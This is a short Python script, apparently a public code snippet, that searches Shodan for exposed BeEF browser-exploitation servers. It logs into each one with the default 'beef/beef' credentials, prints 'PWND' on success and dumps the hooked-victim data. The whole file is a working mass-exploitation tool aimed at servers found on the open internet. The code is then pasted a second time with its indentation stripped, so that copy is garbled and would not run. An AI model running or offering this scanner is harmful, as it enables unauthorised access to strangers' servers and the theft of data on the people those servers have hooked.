thehappydinoa/picanha.py

## picanha.py
import shodan
import sys
import requests

API_KEY = "apitoken"


try:
        api = shodan.Shodan(API_KEY)
        result = api.search('port:3000 product:"Apache httpd" centOS')

        for service in result['matches']:
                ip = service['ip_str']
                try:
                    r = requests.post('http://'+ip+':3000/api/admin/login', json = {'username':'beef', 'password':'beef'})
                    if r.status_code==200:
                        print 'PWND',ip,str(r.status_code)
                        data=r.json()
                        token=data['token']
                        rg = requests.get('http://'+ip+':3000/api/hooks?token='+str(token))
                        print rg.text
                    elif r.status_code==401:
                        print 'Wrong passwd',ip,str(r.status_code)
                    else:
                        pass
                except:
                    pass
except Exception as e:
        print 'Error: %s' % e
        sys.exit(1)
	import shodan
	import sys
	import requests

	API_KEY = "apitoken"


	try:
	api = shodan.Shodan(API_KEY)
	result = api.search('port:3000 product:"Apache httpd" centOS')

	for service in result['matches']:
	ip = service['ip_str']
	try:
	r = requests.post('http://'+ip+':3000/api/admin/login', json = {'username':'beef', 'password':'beef'})
	if r.status_code==200:
	print 'PWND',ip,str(r.status_code)
	data=r.json()
	token=data['token']
	rg = requests.get('http://'+ip+':3000/api/hooks?token='+str(token))
	print rg.text
	elif r.status_code==401:
	print 'Wrong passwd',ip,str(r.status_code)
	else:
	pass
	except:
	pass
	except Exception as e:
	print 'Error: %s' % e
	sys.exit(1)